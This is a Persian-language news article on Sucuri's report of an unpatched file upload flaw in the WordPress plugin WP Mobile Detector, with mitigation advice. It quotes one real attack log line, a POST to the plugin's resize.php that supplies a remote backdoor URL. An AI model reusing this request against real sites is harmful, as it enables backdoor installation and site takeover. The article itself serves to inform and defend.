آسیب‌پذیری افزونه WP Mobile Detector

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

کارشناسان امنیتی sucuri اعلام کرده‌اند، تعداد قابل توجهی از نصب‌های وردپرس ممکن است در معرض یک نقص امنیتی که به‌طور گسترده در افزونه‌ای به نام WP Mobile Detector وجود دارد، قرار داشته باشند. نقصی که بخش قابل توجهی از کاربران را در معرض تهدیدات سایبری قرار می‌دهد. اما خبر نگران کننده‌تر این است که با وجود شناسایی و مهم‌تر از آن انتشار این آسیب‌پذیری و احتمال این‌که مجرمان سایبری ممکن است به‌طرز گسترده‌ای از این نقص سوء استفاده کنند، هنوز هیچ وصله‌ای برای آن عرضه نشده است.

بنابر گزارش کارشناسان شرکت sucuri، مجرمان سایبری از حفره موجود در آشکارساز موبایل WP (افزونه WP Mobile Detector) به منظور تزریق اسکریپت‌های هرزنامه‌ای که حاوی مطالب نه چندان جالب است، استفاده می‌کنند. بعد از شناسایی و افشای این آسیب‌پذیری، افزونه فوق از پوشه افزونه‌های وردپرس حذف گردید. در همین ارتباط شرکت sucuri گزارش کرده است: «تیم تحقیقاتی ما به‌طور تخصصی به برررسی این مسئله پرداخت و در نهایت کشف کرد که نقطه مشترک بسیاری از سایت‌های وردپرسی افزونه آشکارساز موبایل WP است. افزونه‌ای که با آپلود یک فایل اختیاری باعث به وجود آمدن آسیب‌پذیری روز صفر در تاریخ 31 می شده است. افزونه فوق از مخزن وردپرس حذف گردیده است اما هیچ وصله‌ای برای آن وجود ندارد.» در حالی که این آسیب‌پذیری در روز 31 ماه می به‌طور عمومی انتشار یافت، اما گزارش‌هایی که توسط دیوارهای آتش به ثبت رسیده است، نشان می‌دهند که این حمله از تاریخ 27 می آغاز شده است. برآوردها نشان می‌‌دهند که این افزونه حداقل بیش از 10 هزار بار نصب شده و بخش عمده‌ای از نصب کنندگان در معرض حملات سایبری مبتنی بر این آسیب‌پذیری قرار دارند.

آسیب‌پذیری فوق چگونه عمل می‌کند؟

این نقص ناشی از عدم اعتبارسنجی موفقیت‌آمیز ورودی توسط این افزونه بوده که به هکرها اجازه می‌دهد کدهای مخرب php را به ورودی‌ها ارسال کنند. بهره‌برداری از این آسیب‌پذیری ساده بوده و تنها کاری که هکرها باید انجام دهند، ارسال یک درخواست برای resize.php یا timthumb.php ( بله timthump.php در این حالت تنها شامل resize.php خواهد بود.) همراه با یک آدرس URL که نقش یک درب پشتی را بازی می‌کند، درون پوشه افزونه است. قطعه کدی که در ادامه مشاهده می‌کنید، نمونه‌ای از بارگذاری داده‌ها در یک حمله سایبری را نشان می‌دهد

188.73.152.166 - - [31/May/2016:23:54:43 -0400] "POST /wp-content/plugins/wp-mobile-detector/resize.php

Payload:src=hxxp://copia[.]ru/mig/tmp/css.php"

Sucuri گفته است: «با توجه به این‌که هیچ‌گونه وصله‌ای برای این آسیب‌پذیری عرضه نشده است، در نتیجه کار عاقلانه‌ای است کاربران افزونه آشکارساز موبایلی wp را غیر فعال سازند. اما اگر واقعا به این افزونه نیاز دارید بهتر است یک وصله موقتی برای غیر فعال کردن اجرای php در زیرپوشه wp-mobile-detector/cache را مورد استفاده قرار دهید. به طور مثال، از قطعه کد زیر در فایل .htaccess file. استفاده کنید.

deny from all

</Files>

مدیران سایت‌های وردپرسی آلوده می‌توانند درخواست خود را برای بخش پشتیبانی شرکت Sucuri ارسال کنند.

===================================

شاید به این مطالب هم علاقمند باشید: